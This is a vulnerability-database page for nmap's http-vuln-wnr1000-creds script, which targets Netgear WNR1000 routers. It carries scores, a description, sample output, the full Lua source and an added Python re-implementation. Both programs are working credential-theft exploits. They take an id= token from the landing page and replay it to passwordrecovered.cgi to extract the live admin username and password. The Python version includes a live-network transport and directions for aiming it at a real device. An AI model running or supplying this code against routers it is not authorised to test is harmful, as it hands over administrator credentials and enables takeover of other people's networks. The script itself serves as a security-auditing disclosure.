http-vuln-wnr1000-creds NSE Script

Source: nmap.org
Published: 2014-05-04 15:43:30
Authors: Paul AMAR <[email protected]>, Rob Nicholls
ID: NMAP:HTTP-VULN-WNR1000-CREDS.NSE

CVSS3: 9.8 High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

CVSS2: 10 High
AV:N/AC:L/Au:N/C:C/I:C/A:C
Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

EPSS: 0.973 High (Percentile 99.8%)

A vulnerability has been discovered in the Netgear WNR1000 series that allows an unauthenticated attacker to retrieve the administrator credentials through the router's web interface. The script reproduces the c1ph04 technique in two requests: it fetches the configured URI, extracts the numeric id= token that the landing page embeds, then POSTs to passwordrecovered.cgi with that id. A vulnerable firmware answers with a page containing the "Router Admin Username" and "Router Admin Password" fields; the script reports both and stores them in the creds library so later scripts can reuse them. Tested on firmware versions V1.0.2.60_60.0.86 (latest at the time of writing) and V1.0.2.54_60.0.82NA. No CVE has been assigned; the script reports the issue as "IDs: None, 0-day". Note that the script is in the exploit, vuln and intrusive categories: a successful run actually recovers the live administrator password rather than merely fingerprinting the firmware.

Vulnerability discovered by c1ph04.
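As an added example (not part of the nmap script or of the original page), the following Python re-implements the two-request check the NSE script performs, with the HTTP transport injected as a callable so the logic can be exercised offline. The sample HTML, the fake_router stand-in, the address 192.0.2.1 and the live_transport helper are all assumptions, not captured from a real device; the markers matched ("id=", "Router Admin Username", "Router Admin Password") are the ones the script itself looks for.

```python
"""Stand-alone re-implementation of the http-vuln-wnr1000-creds check.

Added example, not nmap's code. The transport is injected as a callable
(method, url, body) -> (status, text) so the check runs offline against a
constructed response; a real device is reached with urllib on port 80.
"""
import re
from typing import Callable, Optional, Tuple
from urllib.parse import urljoin

# Same markers the NSE script matches on, but with non-greedy captures and
# explicit whitespace handling so a long page cannot drag the match across
# unrelated table cells.
ID_RE = re.compile(r"id=(\d+)")
USER_RE = re.compile(
    r'Router Admin Username</td>.*?align="left">\s*(.*?)\s*</td>', re.S)
PASS_RE = re.compile(
    r'Router Admin Password</td>.*?align="left">\s*(.*?)\s*</td>', re.S)

Transport = Callable[[str, str, bytes], Tuple[int, str]]


def extract_recovery_id(body: str) -> Optional[str]:
    """Pull the numeric id the landing page embeds; the CGI call reuses it verbatim."""
    m = ID_RE.search(body)
    return m.group(1) if m else None


def parse_credentials(body: str) -> Optional[Tuple[str, str]]:
    """Return (username, password) if the recovery page leaked both, else None."""
    u = USER_RE.search(body)
    p = PASS_RE.search(body)
    if not (u and p):
        return None
    return u.group(1), p.group(1)


def check_wnr1000(base_url: str, transport: Transport) -> dict:
    """Run the two-request check against the directory holding passwordrecovered.cgi."""
    # urljoin only treats base_url as a directory when it ends with "/", which
    # mirrors the trailing-slash requirement of the NSE script's uri argument.
    if not base_url.endswith("/"):
        base_url += "/"
    status, landing = transport("GET", base_url, b"")
    rid = extract_recovery_id(landing) if status == 200 else None
    if rid is None:
        return {"vulnerable": False, "reason": "no id= token on landing page"}
    status, recovered = transport(
        "POST", urljoin(base_url, f"passwordrecovered.cgi?id={rid}"), b"")
    creds = parse_credentials(recovered) if status == 200 else None
    if creds is None:
        return {"vulnerable": False, "reason": "recovery page did not expose credentials"}
    return {"vulnerable": True, "username": creds[0], "password": creds[1]}


# --- constructed sample responses (assumed layout, not captured from a device) ---
FAKE_LOGIN = '<html><body><form action="/cgi-bin/login?id=1234567"></form></body></html>'
FAKE_RECOVERY = """<table>
<tr><td>Router Admin Username</td><td align="left">admin</td></tr>
<tr><td>Router Admin Password</td><td align="left">s3cret!</td></tr>
<tr><td>MNUText</td></tr></table>"""


def fake_router(method: str, url: str, body: bytes) -> Tuple[int, str]:
    """Offline stand-in for a vulnerable WNR1000: hands out creds for the id it issued."""
    if method == "GET" and url.endswith("/"):
        return 200, FAKE_LOGIN
    if method == "POST" and "passwordrecovered.cgi?id=1234567" in url:
        return 200, FAKE_RECOVERY
    return 404, ""


def live_transport(method: str, url: str, body: bytes) -> Tuple[int, str]:
    """Standard-library transport for a real target (assumed usage, not exercised here)."""
    import urllib.request
    req = urllib.request.Request(url, data=body if method == "POST" else None, method=method)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    print(check_wnr1000("http://192.0.2.1", fake_router))
```

Swapping fake_router for live_transport points the check at a real device; keep the base URL at the directory that holds passwordrecovered.cgi, exactly as with the script's uri argument. The non-greedy patterns are a deliberate departure from the script's greedy `.+` captures, which depend on the cell order of the tested firmware's page.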

Script Arguments

http-vuln-wnr1000-creds.uri

URI path where the passwordrecovered.cgi script can be found. Default: /. The script appends "passwordrecovered.cgi?id=..." directly to this value without inserting a separator, so a non-default path must end with a trailing slash (for example /cgi-bin/).

creds.[service], creds.global

See the documentation for the creds library.

vulns.short, vulns.showall

See the documentation for the vulns library.

slaxml.debug

See the documentation for the slaxml library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

Example Usage

nmap -sV --script http-vuln-wnr1000-creds <target> -p80

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-wnr1000-creds:
|   VULNERABLE:
|   Netgear WNR1000v3 Credential Harvesting Exploit
|     State: VULNERABLE (Exploitable)
|     IDs:  None, 0-day
|     Description:
|       A vulnerability has been discovered in WNR 1000 series that allows an attacker
|       to retrieve administrator credentials with the router interface.
|       Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
|     Disclosure date: 26-01-2014
|     References:
|_      http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip

Requires


local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local creds = require "creds"

description = [[
A vulnerability has been discovered in WNR 1000 series that allows an attacker
to retrieve administrator credentials with the router interface.
Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA

Vulnerability discovered by c1ph04.
]]

---
-- @usage
-- nmap -sV --script http-vuln-wnr1000-creds <target> -p80
-- @args http-vuln-wnr1000-creds.uri URI path where the passwordrecovered.cgi script can be found. Default: /
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-wnr1000-creds:
-- |   VULNERABLE:
-- |   Netgear WNR1000v3 Credential Harvesting Exploit
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  None, 0-day
-- |     Description:
-- |       A vulnerability has been discovered in WNR 1000 series that allows an attacker
-- |       to retrieve administrator credentials with the router interface.
-- |       Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
-- |     Disclosure date: 26-01-2014
-- |     References:
-- |_      http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip
--
---

author = {"Paul AMAR <[email protected]>", "Rob Nicholls"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit","vuln","intrusive"}

portrule = shortport.http

-- Helper kept from the original script. As published the gsub pattern is
-- empty, so this is a no-op; Lua's "." already matches newlines, which is
-- why the patterns below work on the raw body without any escaping.
local escape = function(str) return string.gsub(str, "", "") end

action = function(host, port)
  -- Directory that holds passwordrecovered.cgi. It is concatenated directly
  -- below, so a non-default value must end with "/".
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"

  local vuln = {
    title = 'Netgear WNR1000v3 Credential Harvesting Exploit',
    state = vulns.STATE.NOT_VULN, -- default
    description = [[
      A vulnerability has been discovered in WNR 1000 series that allows an attacker
      to retrieve administrator credentials with the router interface.
      Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA.
      Vulnerability discovered by c1ph04.
      ]],
    references = {
      'http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html',
    },
    dates = {
      disclosure = {year = '2014', month = '01', day = '26'},
    },
  }

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- Step 1: fetch the landing page; the router embeds a numeric id=... token in it.
  local detection_session = http.get(host, port, uri)

  if detection_session.status then
    if not detection_session.body then
      stdnse.debug1("No response body")
      return vuln_report:make_output(vuln)
    end
    -- gather the id (kept as "id=NNN" so it can be appended to the query string as-is)
    local id_netgear = string.match(escape(detection_session.body), ('(id=%d+)'))

    if id_netgear == nil then
      stdnse.debug1("Unable to obtain the id")
      return vuln_report:make_output(vuln)
    end

    -- Step 2: replay the id against the password-recovery CGI with an empty POST
    -- body. A vulnerable firmware answers with the admin username and password.
    local payload_session = http.post(host, port, uri .. "passwordrecovered.cgi?" .. id_netgear, { no_cache = true }, nil, "")
    -- Guard the body as well: a failed request yields a table with body == nil,
    -- and escape(nil) would raise instead of reporting NOT_VULN.
    if payload_session and payload_session.body then
      -- Greedy .+ captures; they rely on the cell order seen on the tested firmware.
      local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username</td>.+align="left">(.+)</td>.+Router Admin')
      local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password</td>.+align="left">(.+)</td>.+MNUText')
      if (netgear_username ~= nil and netgear_password ~= nil) then
        vuln.exploit_results = {
          ("username: %s"):format(netgear_username),
          ("password: %s"):format(netgear_password),
        }
        -- Record the pair in the creds library so later scripts can reuse it.
        local c = creds.Credentials:new(SCRIPT_NAME, host, port)
        c:add(netgear_username, netgear_password, creds.State.VALID)
        vuln.state = vulns.STATE.VULN
      else
        stdnse.debug1("We haven't been able to get username/password")
      end
    end
  end
  return vuln_report:make_output(vuln)
end

